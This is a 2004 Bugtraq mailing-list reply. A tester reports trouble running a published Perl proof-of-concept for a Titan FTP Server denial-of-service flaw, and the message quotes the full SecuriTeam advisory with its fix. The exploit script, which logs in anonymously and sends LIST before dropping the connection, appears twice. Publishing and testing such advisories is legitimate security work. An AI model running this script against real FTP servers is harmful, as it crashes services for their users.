[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <6.0.0.22.2.20040506191900.01dfaf68@www.cjkcode.com>
Date: Thu, 06 May 2004 19:19:59 -0700
From: Gene Ken <gken@....sina.com>
To: Aviram Jenik <aviram@...ondsecurity.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Titan FTP Server Aborted LIST DoS
Hi Aviram,
I have some trouble with the testing of current exploit, the below
is my tested procedure:
1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2
(english, 5.1 build 2600), and the client side is redhat linux 9 using
NAT in
Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.
2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro
platform. also the perl script u mentioned in ur article has successfully
executed like as the below:
/* on my redhat box, i use ftp to verify if the titan ftp server is
running, the
result is the info as below: */
[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.
how to tackle this? thx in advance!
---the titan.pl---
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
#
use IO::Socket;
$host = "192.168.0.2";
my @combination;
$combination[0] = "LIST \r\n";
for (my $i = 0; $combination[$i] ; $i++)
{
print "Combination: $1\n";
$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "2112",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER anonymous\r\n";
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = "PASS a\@b.com\r\n";
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
$ftp = $combination[$i];
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/150 /)
{
last;
}
close $remote;
}
}
At 05:51 AM 5/5/2004, you wrote:
> Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
> * Titan FTP Server version 3.01 build 163
>
> Immune Systems:
> * Titan FTP Server version 3.10 build 169
>
> Solution:
> To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
> Exploit:
> #!/usr/bin/perl
> # Test for Titan FTP server security vulnerability
> #
> # Orkut users? Come join the SecuriTeam community
> # http://www.orkut.com/Community.aspx?cmm=44441
> #
> use IO::Socket;
>
> $host = "192.168.1.243";
>
> my @combination;
> $combination[0] = "LIST \r\n";
>
> for (my $i = 0; $combination[$i] ; $i++)
> {
> print "Combination: $1\n";
>
> $remote = IO::Socket::INET->new ( Proto => "tcp",
> PeerAddr => $host,
> PeerPort => "2112",
> );
> unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
> print "connected\n";
> while (<$remote>)
> {
> print $_;
> if (/220 /)
> {
> last;
> }
> }
>
> $remote->autoflush(1);
>
> my $ftp = "USER anonymous\r\n";
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/331 /)
> {
> last;
> }
> }
>
> $ftp = "PASS a\@b.com\r\n";
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/230 /)
> {
> last;
> }
> }
>
> $ftp = $combination[$i];
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/150 /)
> {
> last;
> }
>
>
> close $remote;
> }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank <mailto:storm@...uriteam.com> STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.
Regards,
Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */
Powered by blists - more mailing lists